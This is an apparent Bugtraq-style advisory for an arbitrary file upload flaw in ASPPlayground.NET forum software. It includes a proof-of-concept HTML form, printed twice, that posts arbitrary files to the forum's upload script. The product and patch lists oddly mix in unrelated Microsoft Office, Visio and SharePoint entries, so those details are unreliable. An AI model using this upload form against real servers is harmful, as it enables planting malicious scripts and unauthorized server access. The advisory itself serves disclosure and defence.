ASPPlayground.NET Remote Arbitrary File Upload Vulnerability
BID:14070
Info
ASPPlayground.NET Remote Arbitrary File Upload Vulnerability
| Bugtraq ID: | 14070 |
| Class: | Design Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 27 2005 12:00AM |
| Updated: | Nov 16 2006 08:11PM |
| Credit: | Discovered by Psycho <[email protected]> |
| Vulnerable: |
Microsoft Visio 2002 SP1 Microsoft Visio 2002 Microsoft SharePoint Portal Server 2001 SP1 Microsoft SharePoint Portal Server 2001 Microsoft Office XP SP3 Microsoft Office XP SP2 Microsoft Office XP SP1 Microsoft Office XP ASPPlayground.NET ASPPlayground.NET 3.2 SR1 |
| Not Vulnerable: |
Microsoft Visio 2002 SP2 Microsoft SharePoint Portal Server 2001 SP3 Microsoft SharePoint Portal Server 2001 SP2A |
Discussion
ASPPlayground.NET Remote Arbitrary File Upload Vulnerability
ASPPlayground.NET is prone to a remote arbitrary file-upload vulnerability.
Exploiting this issue may allow remote attackers to upload arbitrary files including malicious scripts and possibly execute the scripts the affected server.
This issue can ultimately help attackers gain unauthorized access in the context of the webserver.
ASPPlayground.NET is prone to a remote arbitrary file-upload vulnerability.
Exploiting this issue may allow remote attackers to upload arbitrary files including malicious scripts and possibly execute the scripts the affected server.
This issue can ultimately help attackers gain unauthorized access in the context of the webserver.
Exploit / POC
ASPPlayground.NET Remote Arbitrary File Upload Vulnerability
An exploit is not required.
The following proof of concept is available:
http://www.example.com/forum/uploadpro.asp?memori=&deletefile=&mode=
refer to
http://www.example.com/forum/post.asp
*
ASP Playground html bug :
___________________________
<html>
<head>
<title>ASP Playground Version beta 3.2 SR1 upload Arbitrary Files
</title>
</table>
<br>
<table width="98%" border="0" cellspacing="0" cellpadding="0">
<form method="POST" action="http://www.example.com/forum/uploadpro.asp?
memori=&deletefile=&mode=" enctype="multipart/form-data"
onSubmit="return respondToUploader(this)">
<tr>
<td bgcolor="8d5a18">
<table width="100%" border="0" cellspacing="1"
cellpadding="4">
<tr>
<td bgcolor="f8fff3">
upload<br>
<input type="file" name="File1" size="22">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<hr size="1" noshade>
</td>
</tr>
<tr>
<td align="right">
<input type="submit" name="submit" value="upload">
</td>
</tr>
</form>
</table>
</body>
<center><b>pOWERED By Team-Evil [email protected]
</html>
An exploit is not required.
The following proof of concept is available:
http://www.example.com/forum/uploadpro.asp?memori=&deletefile=&mode=
refer to
http://www.example.com/forum/post.asp
*
ASP Playground html bug :
___________________________
<html>
<head>
<title>ASP Playground Version beta 3.2 SR1 upload Arbitrary Files
</title>
</table>
<br>
<table width="98%" border="0" cellspacing="0" cellpadding="0">
<form method="POST" action="http://www.example.com/forum/uploadpro.asp?
memori=&deletefile=&mode=" enctype="multipart/form-data"
onSubmit="return respondToUploader(this)">
<tr>
<td bgcolor="8d5a18">
<table width="100%" border="0" cellspacing="1"
cellpadding="4">
<tr>
<td bgcolor="f8fff3">
upload<br>
<input type="file" name="File1" size="22">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<hr size="1" noshade>
</td>
</tr>
<tr>
<td align="right">
<input type="submit" name="submit" value="upload">
</td>
</tr>
</form>
</table>
</body>
<center><b>pOWERED By Team-Evil [email protected]
</html>
Solution / Fix
ASPPlayground.NET Remote Arbitrary File Upload Vulnerability
Solution:
The vendor has released a fix for this issue. Please see the vendor's website for information on how to obtain and install the most recent version.
Microsoft Office XP SP3
Microsoft Office XP SP1
Microsoft Office XP SP2
Microsoft Office XP
Solution:
The vendor has released a fix for this issue. Please see the vendor's website for information on how to obtain and install the most recent version.
Microsoft Office XP SP3
-
Microsoft Office XP Update: KB837253
http://www.microsoft.com/downloads/details.aspx?familyid=0dd4c99a-9196 -421b-83f0-3d2f93189028&displaylang=en
Microsoft Office XP SP1
-
Microsoft Office XP Update: KB837253
http://www.microsoft.com/downloads/details.aspx?familyid=0dd4c99a-9196 -421b-83f0-3d2f93189028&displaylang=en
Microsoft Office XP SP2
-
Microsoft Office XP Update: KB837253
http://www.microsoft.com/downloads/details.aspx?familyid=0dd4c99a-9196 -421b-83f0-3d2f93189028&displaylang=en
Microsoft Office XP
-
Microsoft Office XP Update: KB837253
http://www.microsoft.com/downloads/details.aspx?familyid=0dd4c99a-9196 -421b-83f0-3d2f93189028&displaylang=en
References
ASPPlayground.NET Remote Arbitrary File Upload Vulnerability
References:
References:
- ASPPlayground.NET Home Page (ASPPlayground.NET)
- Knowledge Base Article - 321780 (Microsoft)
- Knowledge Base Article - 830242 Description of Visio 2002 Service Pack 2 (Microsoft)
- Knowledge Base Article - 837253 Description of the Office XP Update (Microsoft)
- SharePoint Portal Server 2001 Service Pack 2A (Microsoft)
- Vulnerability Note VU#165022 (CERT)